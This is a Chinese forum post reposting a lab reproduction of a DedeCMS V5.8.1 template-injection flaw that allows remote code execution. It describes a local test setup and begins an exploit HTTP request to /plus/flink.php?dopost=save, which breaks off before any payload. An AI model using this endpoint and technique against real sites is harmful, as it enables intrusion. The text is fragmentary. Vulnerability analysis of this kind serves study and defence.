• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 登录 立即注册
    • 切换风格
    快捷导航
    福建二哥 门户 查看主题

    DedeCMS V5.8.1 SSTI模板注入导致RCE漏洞

    发布者: Error | 发布时间: 2025-7-24 15:22| 查看数: 37| 评论数: 0|帖子模式

           

            漏洞类型
            SSTI RCE
            利用条件
            影响范围应用
            漏洞概述
            2021年9月30日,国外安全研究人员Steven Seeley披露了最新的DedeCMS版本中存在的一处SQL注入漏洞以及一处SSTI导致的RCE漏洞,由于SQL注入漏洞利用条件极为苛刻,故这里只对该SSTI注入漏洞进行简要分析复现
            漏环境搭建
            【技术学习资料】
            漏洞复现
            这里使用phpstudy来搭建环境
           

           

           

           

            网站前台:http://192.168.59.1/index.php?upcache=1
           

            网站后台: http://192.168.59.1/dede/login.php?gotopa...
           

            漏洞利用
            <ol>                        GET /plus/flink.php?dopost=save HTTP/1.1Host: 192.168.59.1Referer: 

    最新评论

    新人须知

    常见问题

    维权申诉

    关注微博

    扫描微信

    关于合作

    通讯联系

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表